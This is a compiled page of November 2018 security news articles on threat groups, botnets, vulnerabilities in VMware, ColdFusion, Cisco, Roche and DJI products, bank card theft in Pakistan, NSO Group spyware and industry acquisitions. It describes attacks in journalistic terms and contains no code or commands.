English Articles - Úvod  Odborné èlánky (42)  Bleskovky (0)  Témata (6)  List  EN  CZ  Seriály  Blogy  Newspaper  Magazines  Knihy    

Úvod  0  1  2  3  4  5  6  7  8  9  10  11  12  13  14  15  16  17  18  19  20  21  22  23  24  25  26  27  28  29  30  31  32  33  34  35  36  37  38  39  40  41  42  43  44  45  46  47  48  49  50 


"Inception Attackers" Combine Old Exploit and New Backdoor
11.11.2018 securityweek

A malicious group known as the “Inception” attackers has been using a year-old Office exploit and a new backdoor in recent attacks, Palo Alto Networks security researchers warn.

Active since at least 2014, the group has used custom malware and against targets spanning various industries worldwide, with a special interest in Russia.

In October 2018, the threat actor was observed hitting various European targets in attacks employing an exploit for a vulnerability (CVE-2017-11882) that Microsoft patched in November 2017. Furthermore, the hackers were using a new PowerShell backdoor dubbed POWERSHOWER, which revealed high attention to detail in terms of cleaning up after infection.

As part of the observed attacks, the actor has been using a single malicious document and a remote template to deliver their malicious payload. The use of a template was associated with the group before, but previous attacks revealed the use of two documents, including an initial spear-phish for reconnaissance.

Microsoft Word allows for the loading of templates that are hosted externally, either on a file share, or on the Internet. The template is loaded as soon as the document is opened and hackers have been known to abuse the feature in malicious ways.

The Inception attackers have been using remote templates in their campaigns for the past 4 years, leveraging the various benefits the method provides, such as the fact that the initial document does not contain an explicitly malicious object.

The attack technique also provides the attacker with the option to deploy malicious content to the victim based on the initial data received from the target. This also keeps the malicious code away from researchers attempting to analyze the attack, if the hosting server is down.

The malicious document used in the recent attacks displays decoy content and attempts to fetch the remote content over HTTP. In one attack, the malicious template contained exploits for CVE-2012-1856 and CVE-2017-11882.

The payload in these attacks is POWERSHOWER, a simple PowerShell backdoor that acts as an initial reconnaissance foothold and also supports the download and execution of a secondary payload that includes a more complete set of features.

This also ensures that the more sophisticated and complex malware that the attackers might have in their portfolio remains hidden from investigators. POWERSHOWER can also clean up a significant amount of forensic evidence from the dropper process (including files and registry keys)

VMware Patches VM Escape Flaw Disclosed at Chinese Hacking Contest
11.11.2018 securityweek

VMware informed customers on Friday that patches are available for a critical virtual machine (VM) escape vulnerability disclosed recently by a researcher at the GeekPwn2018 hacking competition.

Organized by the security team of Chinese company Keen Cloud Tech, GeekPwn is a hacking competition that in the past years has led to the discovery of many important vulnerabilities. The competition has been held in China since 2014, but starting with 2017 there has also been an event in the United States.

GeekPwn2018 took place in Shanghai, China, on October 24-25, and its initial prize pool was $800,000.

One of the most interesting entries in the contest came from a researcher at China-based security firm Chaitin Tech, who discovered a guest-to-host escape vulnerability affecting several VMware products. He also identified a less severe information disclosure bug.

Shortly after the VM escape exploit was demonstrated, Chaitin Tech wrote on Twitter that it was the first time anybody managed to escape VMware ESXi and get a root shell on the host system. The company posted a short video showing the exploit in action.

VMware on Tuesday informed customers that it had been provided the details of the vulnerabilities and on Friday it published an advisory describing the flaws and available patches.

According to the virtualization giant, the vulnerabilities, tracked as CVE-2018-6981 and CVE-2018-6982, are caused by an uninitialized stack memory usage bug in the vmxnet3 virtual network adapter.

CVE-2018-6981 affects ESXi, Fusion and Workstation products, and it can allow a guest to execute arbitrary code on the host, while CVE-2018-6982, which only impacts ESXi, can result in an information leak from the host to the guest. VMware pointed out that the vulnerabilities are only present if the vmxnet3 adapter is enabled – other adapters are not impacted.

VMware has released patches and updates for both vulnerabilities.

It’s worth noting that Chaitin Tech researchers have also earned significant prizes at ZDI’s Pwn2Own hacking competition in the past years. It’s unclear how much they earned for the VMware product vulnerabilities disclosed at GeekPwn.

Data from ‘almost all’ Pakistani banks stolen, Pakistani debit card details surface on the dark web
11.11.2018 securityaffairs

According to the head of the Federal Investigation Agency’s (FIA) cybercrime wing.almost all Pakistani banks were affected by a recent security breach.
Almost all Pakistani banks were affected by a recent security breach, the shocking news was confirmed by the head of the Federal Investigation Agency’s (FIA) cybercrime wing.

“According to a recent report we have received, data from almost all Pakistani banks has been reportedly hacked,” FIA Cybercrimes Director retired Capt Mohammad Shoaib told Geo News on Tuesday.

The comment released by the Capt Mohammad Shoaib follows the discovery made by cyber security firm Group-IB of a fresh dump of Pakistani credit and debit cards on dark web forums.

The agency is currently investigating more than 100 cases in connection with the security breach.

“More than 100 cases [of cyber-attack] have been registered with the FIA and are under investigation. We have made several arrests in the case, including that of an international gang [last month],” Capt Shoaib said.

The huge trove of data surfaced on the Dark Web includes 20,000 Pakistani debit card details surface on the dark web. Data belongs to customers of “most of the banks” operating in the country.

In an interview with DawnNewsTV, Shoaib explained that hackers based outside Pakistan have compromised the infrastructure of several Pakistani banks.

“The hackers have stolen large amounts of money from people’s accounts,” he added.

“The recent attack on banks has made it quite clear that there is a need for improvement in the security system of our banks,”

FIA notified his findings to all banks in the country called for a meeting with their representatives with the intent to respond to the incident, limit the damages and improve the overall security of Pakistani banks.

“Banks are the custodians of the money people have stored in them,” Shoaib said. “They are also responsible if their security features are so weak that they result in pilferage.”

At the time it is not clear when the security breach took place and how the attackers gained access to the systems at the Pakistani banks.

“An element of banking fraud which is a cause of concern is that banks hide the theft [that involves them]… and the clients report [the theft] to the banks and not to us, resulting in a loss of people’s money,” he told DawnNewsTV.

“We are trying to play a proactive role in preventing bank pilferage,”

The Pakistani banks are facing a severe emergency, last week a cyber attack on Bank Islami allowed attackers to stole at least Rs2.6 million from its accounts.

By the end of last week, some Pakistani banks had suspended usage of their debit cards outside the country and blocked all international transactions on their cards.

A large Pakistani bank informed its clients that online mobile banking services would be temporarily suspended starting from November 3.

Pakistan Computer Emergency Response Team (PakCERT) released a report that details the timeline and scale of data leaks. Experts at PakCERT believe that the data was obtained through card skimming.

According to the report, the first dump was offered for sale on the site JokerStash, experts found the “PAKISTANWORLD-EU-MIX-01,” containing over 11,000 records, more than 8,000 records were related to at least nine Pakistani banks.

Pakistani banks

Pakistani banks 2.png

These cards were offered for sale in the cybercrime underground for $100 up to $160.

Flaws in Roche Medical Devices Can Put Patients at Risk
10.11.2018 securityweek
ICS  Vulnerebility

Vulnerabilities discovered in several medical devices made by the diagnostics division of Swiss-based healthcare company Roche can put patients at risk, a cybersecurity firm has warned.

Researchers at Medigate, a company specializing in securing connected medical devices, identified five vulnerabilities in three types of products from Roche. The flaws impact Accu-Chek glucose testing devices, CoaguChek devices used by healthcare professionals in anticoagulation therapy, and Cobas portable point-of-care systems.

A detailed list of vulnerable products and versions is available in an advisory published recently by ICS-CERT. It’s worth noting that each vulnerability impacts certain models and versions of the Roche devices.

The affected products consist of a base unit and a handheld device that communicates wirelessly – including over Wi-Fi if an optional module is available – with the base unit. Medigate researchers discovered that an attacker with access to the local network can hack the base station and from there target the handheld devices.

Serious vulnerabilities discovered in Roche medical devicesThe flaws, with CVSSv3 scores ranging between 6.5 and 8.3, can be exploited by a network attacker to bypass authentication to an advanced interface, execute code on the device using specific medical protocols, and place arbitrary files on the filesystem.

One of the command execution flaws requires authentication, but the ICS-CERT advisory shows that the affected products use weak access credentials, which suggests that it may be easy for an attacker to authenticate on the system.

“The vulnerabilities are easy to exploit once known, but are very hard to discover and research,” Medigate told SecurityWeek.

According to the company, the vulnerabilities can pose a threat to patients using the impacted devices.

“These vulnerabilities allow complete control of the base station and hand-held device including all generated network traffic. This means the medical protocol used by the device can be altered and the medical data can be changed. In the case of a blood glucose meter, this can put a patient at risk. If the device it altered, it could affect the readings or data transfer which could lead to incorrect treatment,” the company explained.

According to ICS-CERT, Roche is preparing patches for the vulnerabilities found by Medigate and they should be available sometime this month. In the meantime, the company has advised customers to restrict network and physical access to affected devices, protect connected endpoints from malicious software and unauthorized access, and monitor the network for suspicious activity.

ForeScout Acquires Industrial Security Firm SecurityMatters for $113 Million in Cash
10.11.2018 securityweek

Network access security firm ForeScout Technologies (NASDAQ:FSCT) announced on Thursday that has acquired operational technology (OT) network security firm SecurityMatters for approximately $113 million in cash.

The acquisition will help ForeScout provide deeper visibility into OT networks to help industrial firms mitigate threats and segment IT and OT environments, the company said.

Founded in 2009 by Damiano Bolzoni, Sandro Etalle and Emmanuele Zambon, SecurityMatters provides organizations with device visibility, continuous network monitoring, and threat and anomaly detection for industrial environments using passive network monitoring that doesn’t impact operations.

The two companies announced a technology integration partnership earlier this year.

ForeScout’s CounterACT visibility platform, combined with SecurityMatters’ technology, enables agentless device discovery, classification and assessment for a wide variety of devices across IT and OT infrastructure.

ForeScout has more than 2,900 customers in over 80 countries that use its solutions, which help accelerate incident response, automate workflows and optimize existing security investments.

Late last month ForeScout launched a partnership with industrial networking and security firm Belden.

Adobe ColdFusion Vulnerability Exploited in the Wild
10.11.2018 securityweek

A recently patched remote code execution vulnerability affecting the Adobe ColdFusion web application development platform has been exploited in the wild by one or more threat groups, Volexity warned on Thursday.

The security hole in question is tracked as CVE-2018-15961 and it was resolved by Adobe in September with its Patch Tuesday updates. The vendor described the vulnerability as a critical unrestricted file upload bug that allows arbitrary code execution. This was one of the five flaws reported to Adobe by Pete Freitag of Foundeo.

The updates were initially assigned a priority rating of “2,” which indicates that exploitation is less likely. However, Adobe silently updated its advisory in late September after learning that CVE-2018-15961 had been actively exploited and assigned a priority rating of “1” for the ColdFusion 2018 and ColdFusion 2016 updates.

According to Volexity, which specializes in incident response, forensics and threat intelligence, there is no public exploit for the targeted ColdFusion vulnerability. The company says it has spotted what it believes to be a China-based APT group exploiting the flaw to upload an old webshell known as China Chopper to a vulnerable server.

The compromised web server had all ColdFusion updates installed, except for the one patching CVE-2018-15961. The attack took place roughly two weeks after Adobe released the fixes, the security firm said.

Volexity’s analysis showed that the vulnerability was introduced when Adobe decided to replace the older FCKeditor WYSIWYG editor with the newer CKEditor. The security bug is said to be similar to a ColdFusion flaw patched back in 2009.

Exploitation of the vulnerability is not difficult, Volexity noted, as it only requires sending a specially crafted HTTP POST request to the upload.cfm file, which does not require any authentication and is unrestricted.

While CKEditor prevented users from uploading certain types of potentially dangerous files, such as .exe and .php, it still allowed .jsp (JavaServer Pages) files, which can be executed in ColdFusion.

The APT group observed by Volexity exploited this weakness, along with a bug that allowed them to change the destination directory, to upload the webshell.

After spotting this attack, the company’s researchers started analyzing publicly accessible ColdFusion servers and found many systems that appeared to have been compromised, including ones belonging to government, educational, healthcare, and humanitarian aid organizations. Many of the hacked sites had been defaced or showed attempts to upload a webshell.

While the researchers could not confirm that all attacks exploited CVE-2018-15961, there is some indication that a non-APT threat group may have discovered the flaw months before Adobe released a patch in September, as some of the attackers’ files had been last modified in early June.

Some of the targeted websites included defaced index files that attributed the attack to AnoaGhost, a hacktivist group said to be based in Indonesia and which appears to have ties to pro-ISIS hacker gangs.

Prioritizing Flaws Based on Severity Increasingly Ineffective: Study
10.11.2018 securityweek

The large number of vulnerabilities found every year has made it increasingly difficult for organizations to effectively prioritize the security holes exposing their applications and networks, according to a new report published on Wednesday by Tenable.

The company, which helps organizations reduce their cyber risk, has conducted a detailed analysis of the flaws discovered last year and in the first half of 2018.

Tenable has counted all the common vulnerabilities and exposures (CVE) identifiers assigned last year and determined that there were 15,038 new flaws discovered, compared to 9,837 in 2016, which represents an increase of more than 50%. There has been an increase of 27% in the number of vulnerabilities disclosed in the first half of 2018 compared to the same period of 2017, and the security firm estimates that this year the count could reach 18,000-19,000.

In 2017, over half of the vulnerabilities were rated “critical” or “high severity” - CVSSv3 assigns higher scores to flaws compared to CVSSv2. However, exploits were only made public for 7% of the total and only a small subset of those were actually weaponized and exploited by malicious actors.

Disclosed CVEs and exploitability by year

According to Tenable, enterprises find, on average, 870 unique vulnerabilities per day, including newly discovered flaws and unpatched issues that were disclosed previously. Of all the vulnerabilities discovered so far, roughly 12% have been rated “critical,” which means organizations have to deal with roughly 100 weaknesses per day even if they prioritize only the most serious findings.

“Trying to remediate and mitigate all disclosed vulnerabilities, even when prioritizing High and Critical vulnerabilities, is an exercise in futility, as our data shows,” Tenable said in its report.

“Managing vulnerabilities at volume and scale across different teams requires actionable intelligence. Otherwise, we’re not making informed decisions – we’re guessing. An intelligence deficit in vulnerability management is causing real-world implications – with 34 percent of breached organizations stating they were aware of the vulnerability that led to their breach before it happened,” it added.

The company has found that roughly a quarter of all 107,000 CVEs assigned until October 2018 impact enterprise environments and nearly two-thirds of the vulnerabilities found by enterprises are “high severity” or “critical.”

The security holes most commonly found in enterprises impact software from Microsoft, Google, Oracle, and Adobe, including the .NET Framework, Chrome, Java, Internet Explorer, Flash Player and Outlook. More than a quarter of enterprises are also exposed to attacks due to issues related to SSL.

“The problem is we have too much information and not enough intelligence. Turning information into intelligence requires interpretation and analysis – something that doesn’t scale easily. The solution lies in operationalizing intelligence based on your organization’s unique characteristics – your most critical digital assets and vulnerabilities,” Tenable said.

The complete Tenable Vulnerability Intelligence Report is available on the company’s website in PDF format.

Entrust Datacard Acquires Spanish Firm Safelayer
10.11.2018 securityweek

Minneapolis-based identity firm Entrust Datacard has acquired Barcelona, Spain firm Safelayer Secure Communications. Financial details have not been disclosed.

Against a background of increasing digitization of both commerce and government, Entrust Datacard provides trusted identity and secure transaction technologies. Safelayer complements this with software for public key infrastructure (PKI) solutions, multifactor authentication systems, electronic signature, encryption and secure transactions, and for generating trust services in telematic networks such as the Internet and mobile networks.

The two key reasons for the acquisition appear to be geographic expansion (Safelayer is particularly strong in the EU and Latin America); and Safelayer's eIDAS competencies.

On the former, Anudeep Parhar, CIO at Entrust Datacard, commented, "At Entrust Datacard we are committed to being the industry leader in certificate-based security solutions across the regions we serve. As such, we look forward to bringing Safelayerís established PKI and Electronic Trust Services in EMEA and Latin America into our portfolio."

On the latter, he said, "The strong and talented team at Safelayer, coupled with their digital signature solution and eIDAS competencies, enhances our team and further establishes our commitment to accredited trust services across these regions and globally."

eIDAS, standing for 'electronic identification and trust services', is an EU Regulation that came into force in July 2016. As a Regulation it is required law in all EU member states. Its purpose is to enhance trust in electronic transactions between businesses, citizens and public authorities by providing a common legal framework for the cross-border recognition of electronic ID and consistent rules on trust services across the EU.

It provides a framework that allows EU citizens to use electronic ID to access public services in other member states; and establishes requirements for trust services and how trust service providers can gain qualified status.

In 2016, Safelayer became a founding member of the Cloud Signature Consortium. Its purpose is to develop a new standard for cloud-based digital signatures that will meet the requirements of eIDAS -- a standard that it expects to have a global impact.

In addition to market expansion opportunities, says Entrust Datacard in announcing the acquisition, it "also provides Entrust Datacard with Safelayerís best-in-class eIDAS-compliant digital signature technology. The digital signing solution is a comprehensive platform for eIDAS trust services that combines authentication, single sign on (SSO) and identity federation; the solution incorporates PKI for implementing electronic signature functions."

Entrust Datacard intends to maintain Safelayer's Spanish offices and existing staff.

This is Entrust Datacardís second security acquisition in under six months. The company made an investment in CensorNet and acquired its SMS Passcode solution in July 2018.

Snowden speaks about the role of surveillance firm NSO Group in Khashoggi murder
9.11.2018 securityaffairs

Snowden warns of abuse of surveillance software that also had a role in the murder of the Saudi Arabian journalist Jamal Khashoggi.
The popular US whistleblower Edward Snowden has reported the abuse of surveillance made by many governments, he blamed the Israeli company NSO Group for developing and selling surveillance software to Saudi Arabia.

Speaking during a conference in Tel Aviv on Wednesday, Snowden explained that the spy software developed by NSO Group enabled the murder of dissident journalist Jamal Khashoggi, at a conference in Tel Aviv on Wednesday.

Snowden claimed that Israeli company NSO Group had sold Saudi Arabia software that was used to compromise the smartphone of one of Khashoggi’s friends.

Officially the sale of surveillance software is limited to authorized governments to support investigation of agencies on criminal organizations and terrorist groups.

Unfortunately, its software is known to have been abused to spy on journalists and human rights activists.

In July, Citizen Lab collected evidence of attacks against 175 targets worldwide carried on with the NSO spyware. Citizen Lab uncovered other attacks against individuals in Qatar or Saudi, where the Israeli surveillance software is becoming very popular.

Panama Up to 150 (Source: Univision)1 2012-2014
UAE 1 (Source: Citizen Lab) 2016
Mexico 22 (Source: Citizen Lab) 2016
Saudi Arabia 2 (Source: Amnesty, Citizen Lab) 2018
In August, an Amnesty International report confirmed that its experts identified a second human rights activist, in Saudi Arabia, who was targeted with the powerful spyware.

According to Joshua Franco, Amnesty’s head of technology and human rights, recent discovery demonstrates that trading of surveillance software is going out-of-control.

Now Snowden claims that the Israeli surveillance firm NSO Group had a primary role in Khashoggi’s murder that is “one of the major stories that’s not being written about.”

“They are the worst of the worst in selling these burglary tools that are being actively, currently used to violate the human rights of dissidents, opposition figures, activists, to some pretty bad players,” Snowden told his audience.

The Snowden Video Interview was published by almasdarnews.com.

Snowden told to the audience that the surveillance firms don’t operate “to save lives, but to make money.”

Citizen Lab

NEW REPORT: The Kingdom Came to Canada: How Saudi-Linked Digital Espionage Reached Canadian Soil https://citizenlab.ca/2018/10/the-kingdom-came-to-canada-how-saudi-linked-digital-espionage-reached-canadian-soil/ …

10:02 PM - Oct 1, 2018
Twitter Ads info and privacy

The Kingdom Came to Canada: How Saudi-Linked Digital Espionage Reached Canadian Soil - The Citizen...
In this report, we describe how Canadian permanent resident and Saudi dissident Omar Abdulaziz was targeted with a fake package delivery notification. We assess with high confidence that Abdulaziz’s...

379 people are talking about this
Twitter Ads info and privacy
The principal product of the NSO Group is a surveillance software called Pegasus, it allows to spy on the most common mobile devices, including iPhones, Androids, and BlackBerry and Symbian systems.

Pegasus is a perfect tool for surveillance, it is able to steal any kind of data from smartphones and use them to spy on the surrounding environment through their camera and microphone.

“In its commercial proposals, the NSO Group asserts that its tracking software and hardware can install itself in any number of ways, including “over the air stealth installation,” tailored text messages and emails, through public Wi-Fi hot spots rigged to secretly install NSO Group software, or the old-fashioned way, by spies in person.” continues The New York Times.

Compliance to Cybersecurity Requirements and False Claims Act
9.11.2018 securityaffairs

There’s a growing risk of companies receiving substantial fines for not complying with cybersecurity standards under False Claims Act.
However, an emerging concern for businesses that act as contract-based service providers for government entities is that those establishments could also be liable under the False Claims Act (FCA).

What Is the False Claims Act?
The False Claims Act is enforced at the federal level as well as in over two dozen states and the District of Columbia. It stipulates that private citizens can file lawsuits against entities engaging in fraud or dishonesty during certain government transactions.

The citizens that participate in such legal action are called whistleblowers and typically receive between 15 and 25 percent of the recovered amount in a successful suit. Many FCA violations relate to inaccurate billing or falsified information given to government authorities. However, federal contractors can also be held liable for not adhering to the terms of their agreements.

More specifically, the Supreme Court ruled that FCA liability can occur if a government contractor submits a claim for payment for services but does not mention nonadherence to a statutory, regulatory or contractual requirement. The contractor must also know that the shortcoming would affect the government’s decision to pay.

The Link Between the False Claims Act and Cybersecurity
It may not initially be clear how the FCA relates to cybersecurity until people realize that federal contractors must abide by numerous cybersecurity best practices under the Federal Acquisition Regulation (FAR), established June 15, 2016.

The FAR mentions 15 “basic safeguarding requirements” for cybersecurity, including sanitizing or destroying media or devices containing federal contract information at the end of their usage periods and limiting access to information systems so that it encompasses only the actions that authorized users should carry out — not additional privileges.

There’s also the Defense Federal Acquisition Regulation Supplement (DFARS). It relates to contractors working for the Department of Defense (DoD) and dictates how they must handle controlled unclassified information (CUI) by protecting it adequately and reporting breaches promptly.

Parties that did not get in compliance by the end of December 2017 were at risk of losing their contracts or getting stop-work orders. They also had to report how they failed to meet the standards set.

Then, in early 2018, the General Services Administration (GSA) announced plans to officially regulate how federal contractors protect information. Whereas the FAR does not cover cybersecurity breach reporting requirements, the GSA holds contractors responsible for reporting breaches and doing so to the appropriate parties within a defined timeframe.

A Lack of Cybersecurity Best Practices Could Cause Obstacles
The details about the regulations above show how companies that provide services to government entities could be liable under the FCA for not honoring the terms of their contracts — specifically those relating to cybersecurity. Each false claim made that falls within the specifications of the FCA carries a fine of $5,500 to $11,000. The offending party must also pay the whistleblower’s legal fees.

However, even the businesses that don’t experience that consequence of noncompliance could find that a lack of cybersecurity readiness hinders operations.

The DoD proposed taking cybersecurity into account when choosing contractors. Already, the body evaluates cost, schedule and performance. But DoD representatives recognize that contractors are at risk of being infiltrated by cybercriminals, so if contractors don’t take cybersecurity seriously, they could find it difficult to remain competitive during the contract bidding process.

Even businesses that provide non-DoD-related services could become limited by not focusing on appropriate levels of cybersecurity. If other government agencies follow the DoD’s lead and make cybersecurity a priority, the businesses that provide services to government-run entities like public schools or veterans’ affairs hospitals could find their federal associations ceasing.

Cybersecurity False Claims Act

Breaches Bring About Worldwide Headlines
The worst cybersecurity breaches attract attention around the world. The total number of victims could rise to the millions, and some attacks even threaten local infrastructure, such as power grids. Although the emphasis here was on U.S. cybersecurity, the matter of staying safe from online threats is a global concern.

It’s not difficult to see why government entities know they can’t afford to do business with companies that aren’t well protected against cybersecurity issues.

When businesses neglect cybersecurity, they could get sued under the FCA, lose government contracts and suffer substantial reputational damage.

BCMPUPnP_Hunter Botnet infected 400k routers to turn them in email spammers
9.11.2018 securityaffairs

Security researchers at 360 Netlab have discovered a new spam botnet, dubbed BCMPUPnP_Hunter, that likely already infected around 400,000 machines to date.
Security experts from 360 Netlab security firm have recently discovered a new spam botnet, dubbed BCMPUPnP_Hunter, that mainly targets routers that have the BroadCom UPnP feature enabled.

The BCMPUPnP_Hunter was first spotted in September, but researchers were able to capture the first sample only a month later.

Experts pointed out that the interaction between the botnet and the potential target takes multiple steps, it starts with tcp port 5431 destination scan-

“it starts with tcp port 5431 destination scan, then moving on to check target’s UDP port 1900 and wait for the target to send the proper vulnerable URL.” reads the analysis published by 360 Netlab.

“After getting the proper URL, it takes another 4 packet exchanges for the attacker to figure out where the shellcode’s execution start address in memory is so a right exploit payload can be crafted and fed to the target.”

Experts noticed that the amount of infection is very large, the number of active scanning IP in each scan event is about 100,000.

Once the device is compromised, the attacker implements a proxy network (tcp-proxy) that communicates with well-known mail servers such as Outlook, Hotmail, Yahoo! Mail, etc. This circumstance suggests the botnet may have been involved in spam campaigns.

Below some findings shared by the experts:

It can be seen that the scan activity picks up every 1-3 days. The number of active scanning IP in each single event is about 100,000
All together we have 3.37 million unique scan source IPs. It is a big number, but it is likely that the IPs of the same infected devices just changed over time.
The number of potential infections may reach 400,000 according to Shodan based on the search of banner: Server: Custom/1.0 UPnP/1.0 Proc/Ver
The geographical distribution for the scanner IPs in the last 7 days revealed that most of the infected devices are in India, the United States, and China.


The experts probed the scanners and discovered at least 116 different type of infected device information.

The malware sample analyzed by the experts is composed of the main body and a shellcode that is apparently designed specifically to download the main sample and execute it.

“The main function of shellcode is to download the main sample from C2( and execute it.” continues the analysis.

“The shellcode has a full length of 432 bytes, very neatly organized and written, some proofs below (We did not find similar code using search engines). It seems that the author has profound skills and is not a typical script kid:”

The main sample includes an exploit for the BroadCom UPnP vulnerability and the proxy access network module. The main sample can parse four instruction codes from C2, enable the port scan, search for a potentially vulnerable target, empty current task, access proxy network.

The botnet was likely designed to proxy traffic to servers of well-known mail service providers. The researchers believe the proxy network established by the botnet is abused for spam due to the connections only made over TCP port 25.

New Spam Botnet Likely Infected 400,000 Devices
9.11.2018 securityweek
BotNet  Spam

A newly discovered botnet that appears designed to send spam emails likely infected around 400,000 machines to date, 360 Netlab security researchers warn.

Dubbed BCMPUPnP_Hunter, the threat was observed mainly targeting routers that have the BroadCom UPnP feature enabled. The botnet emerged in September, but a multi-step interaction between the botnet and the potential target prevented the researchers from capturing a sample until last month.

The interaction, 360 Netlab explains, starts with tcp port 5431 destination scan, after which the malware checks the target’s UDP port 1900 and then waits for the proper vulnerable URL. After four other packet exchanges, the attacker finally figures out the shellcode's execution start address in memory and delivers the proper exploit.

Following a successful attack, a proxy network is implemented, to communicate with well-known mail servers such as Outlook, Hotmail, Yahoo! Mail, and others, most likely with the intent to engage in spam activities.

Over the past month, the number of scanning source IPs has been constantly in the 100,000 range, though it also dropped below the 20,000 mark roughly two weeks ago. The scan activity picks up every 1-3 days, with around 100,000 scan source IPs involved in each scan event.

Overall, the researchers registered over 3.37 million scan source IPs, but they believe this large number is the result of some devices changing their IP over time.

By probing the scanners, 360 Netlab managed to obtain 116 different type of infected device information. The botnet is believed to have infected around 400,000 devices all around the world, with the highest concentration in India, the United States, and China.

The analyzed malware sample consists of a shellcode and the main body. The shellcode, apparently designed specifically to download the main sample and execute it, seems to have been created by a skilled developer, the researchers point out.

The main sample includes an exploit for the BroadCom UPnP vulnerability, as well as the proxy access network module, and can parse four instruction codes from the command and control (C&C) server: an initial packet without practical functionality, and commands to search for vulnerable targets, to empty the current task, and to launch the proxy service.

The botnet, the researchers say, appears designed to proxy traffic to servers of well-known mail service providers. With connections only made over TCP port 25 (which is used by SMTP - Simple Mail Transfer Protocol), the researchers are confident the proxy network established by the botnet is abused for spam.

Default Account Exposes Cisco Switches to Remote Attacks
9.11.2018 securityweek

A default account present in Cisco Small Business switches can allow remote attackers to gain complete access to vulnerable devices. The networking giant has yet to release patches, but a workaround is available.

According to Cisco, Small Business switches running any software release come with a default account that is provided for the initial login. The account has full administrator privileges and it cannot be removed from the system.

The account is disabled if an administrator configures at least one other user account with the access privilege set to level 15, which is equivalent to root/administrator and provides full access to the switch. However, if no level 15 accounts are configured or existing level 15 accounts are removed from the device, the default account is re-enabled and the administrator is not notified.

Malicious actors can leverage this account to log in to a device and execute arbitrary commands with full admin privileges.

The vulnerability, tracked as CVE-2018-15439, was reported to Cisco by Thor Simon of Two Sigma Investments LP. The vendor says it’s not aware of any attempts to exploit the vulnerability for malicious purposes.

The flaw affects Cisco Small Business 200, 300 and 500 series switches, Cisco 250 and 350 series smart switches, and Cisco 350X and 550X series stackable managed switches. The vendor says Cisco 220 series smart switches are not impacted.

Until Cisco releases a patch, users have been advised to add at least one user account with privilege level 15 to their device’s configuration. The company’s advisory contains detailed instructions on how such accounts can be configured.

Cisco has also informed customers of a critical authentication bypass vulnerability affecting the management console in its Stealthwatch Enterprise product. A remote attacker can exploit the vulnerability to bypass authentication and execute arbitrary commands with admin rights.

Another critical vulnerability that allows arbitrary command execution with elevated privileges has been found in Cisco Unity Express.

Patches are available for both the Unity Express and the Stealthwatch Enterprise flaws and there is no evidence of malicious exploitation.

Cisco recently rolled out patches for a denial-of-service (DoS) vulnerability impacting some of its security appliances. The security hole has been exploited in attacks and the company released fixes only a week after disclosure.

Man Behind DDoS Attacks on Gaming Companies Pleads Guilty
9.11.2018 securityweek
A 23-year-old man from Utah pleaded guilty this week to launching distributed denial-of-service (DDoS) attacks against several online gaming companies in 2013 and 2014.

According to the U.S. Justice Department, Austin Thompson targeted servers belonging to Sony Online Entertainment (later spun off and renamed Daybreak Game Company) and other companies. The man announced his attacks via the Twitter account @DerpTrolling.

The account still exists, but it hasn’t been active since January 2016, when it resumed tweeting after a break of more than one year.

Thompson has pleaded guilty to causing damage that exceeds $95,000 to a protected computer, for which he faces up to 10 years in prison, a fine of $250,000, and 3 years of supervised release. His sentencing is scheduled for March 1, 2019.

While authorities charged the Utah man for attacks between 2013 and 2014, DerpTrolling was active since 2011. DerpTrolling made some headlines in 2013 and 2014 after disrupting online gaming servers owned by EA, Sony, Riot Games, Microsoft, Nintendo and Valve.

At one point, the cybercriminal leaked some account credentials allegedly belonging to PlayStation Network, Windows Live and 2K Games users, but it later turned out that the data was either fake or not obtained as a result of a breach, as DerpTrolling claimed.

“Denial-of-service attacks cost businesses millions of dollars annually,” said U.S. Attorney Adam Braverman. “We are committed to finding and prosecuting those who disrupt businesses, often for nothing more than ego.”

DJI Drone Vulnerability Exposed Customer Data, Flight Logs, Photos and Videos
9.11.2018 securityweek

Vulnerability Exposed DJI Customer Data and Drone Flight Logs, Photos and Videos Generated During Drone Flights

In August 2017 the U.S. Immigration and Customs Enforcement agency (ICE) issued an intelligence bulletin warning that Da Jiang Innovations (DJI) -- the world's largest drone manufacturer -- was "likely passing U.S. critical infrastructure and law enforcement data to [the] Chinese government." DJI strenuously denied the accusation.

Now Check Point Research has published details of a DJI vulnerability that would allow the Chinese government -- or anybody else in the world -- to simply take that data without any involvement from DJI. The vulnerability could provide full access to a drone user's DJI account. A successful attacker would be able to obtain cloud-based flight records, stored photographs, user PII including credit card details -- and a real-time view from the drone's camera and microphone.

The vulnerability, providing access to users' personal details, would be attractive to cybercriminals around the world. The flight records could also be used to track delivery drones to determine where deliveries are made in order to intercept and steal them.

The live camera view would be attractive to nation-state actors involved in critical infrastructure reconnaissance. Indeed, last year's ICE bulletin notes that the Los Angeles Sheriff's Office had announced its intention to deploy DJI drones for "barricaded suspects, hostage situations and other high-risk tactical operations, hazardous materials incidents, and fire related incidents."

It also notes that the contractor building a DHS National Bio and Agro-Defense Facility in Manhattan, Kansas, is using DJI drones "to assist with construction layout and provide security during construction."

The business and facility use of drones is growing rapidly. Check Point describes the potential espionage value in more detail. "For those looking to target critical infrastructure facilities such as energy plants or water dams," the researchers write, "analyzing intricate details and images of such facilities could easily reveal information that would prove highly useful in a future attack."

It points out that threat actors would be able to home in on various technologies to find out which vendor of CCTV cameras or biometric/electronic door locks an enterprise may be using. These products and suppliers could then be investigated to find the correct tools that could bypass them. "Indeed," says the Check Point report, "having a detailed view of sensitive areas could reveal to criminals and potential terrorists where security gaps in general may lie, and pave the path to exploiting those gaps."

This vulnerability, Oded Vanunu, head of products vulnerability research at Check Point, told SecurityWeek, "is a unique opportunity for malicious actors to gain priceless information -- you have an eye in the sky. Organizations are moving towards automated flights, sometimes with dozens of drones patrolling across sensitive facilities. With this vulnerability you could take over the accounts and see and hear everything that the drones see or hear. This is a huge opportunity for malicious actors."

It would be attractive to general criminals to gain PII and use or resell it, and for criminals and state actors to use "in targeted attacks against cities or sensitive facilities."

The vulnerability itself involves a loophole in DJI's customer identification. By attacking the token used to identify registered users across the various DJI services, Check Point gained access to all the DJI platforms. It required registering an account within the DJI user forum and then posting an XSS attack. "Unlike most account takeovers, though, that rely on social engineering methods to fool the target victim into sending the attacker their login credentials," note the researchers, "our team simply collected the user's identifying token via a regular looking link posted in DJI's forum to essentially hack into the victim's account across all platforms."

Once the identifying token is acquired, an attacker would be able to hijack the account, log in and gain access to the flight and personal data registered to the user's drone.

Check Point reported the vulnerability to DJI, and it was fixed on September 28, 2018.

